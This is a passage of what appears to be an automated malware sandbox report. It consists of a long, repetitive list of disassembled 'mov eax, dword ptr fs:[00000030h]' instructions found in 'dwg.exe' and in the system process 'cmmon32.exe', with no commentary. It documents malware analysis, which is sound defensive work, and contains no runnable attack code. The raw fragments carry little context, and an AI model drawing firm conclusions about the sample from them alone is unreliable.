      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E120050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E120050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E183884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E183884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1058EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1869A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056583D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562CBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005649AA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00564A27 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00564EF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045814FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04503D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0454A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04578DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04508EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04582073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04591074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
